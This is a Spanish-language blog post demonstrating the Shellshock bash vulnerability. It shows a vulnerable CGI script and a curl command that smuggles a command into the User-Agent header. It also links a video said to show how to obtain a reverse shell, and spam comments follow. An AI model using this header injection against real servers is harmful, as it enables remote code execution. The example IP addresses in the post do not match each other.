Aprovechando la vulnerabilidad Shellshock es posible generar un "reverse shell" para tomar control remoto de la víctima.
PoC:
1. Se tiene un CGI vulnerable. Por ejemplo: http://198.168.1.1/cgi-bin/victim.cgi
2. Código del CGI vulnerable:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Demo Shellshock Exploit (CVE-2014-6271)</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
3. En el equipo de cómputo del atacante ejecutar:
curl -A "() { foo;};echo;/bin/echo vulnerable" http://192.168.1.1/cgi-bin/victim.cgi
El siguiente videoxploit detalla la forma de obtener un "reverse shell" aprovechando Shellshock.
https://www.youtube.com/watch?v=a6FmnUSEkKM
I was more than happy to uncover this great site. I need to to thank you for your time due to this fantastic read!! I definitely enjoyed every bit of it and I have you bookmarked to see new information on your blog.
ResponderEliminarSmartsurveys4u
thanks sir
ResponderEliminarhttps://tourmypakistan.com.pk/accommodation/eden-hotel-naran/?adults=1&kids=0&rooms=1&date_from&date_to&child_ages%5B0%5D=0
Such a nice piece of information. This post has summed up of all the interesting things in a perfect way & in a single Blog. Asan Bazaar
ResponderEliminar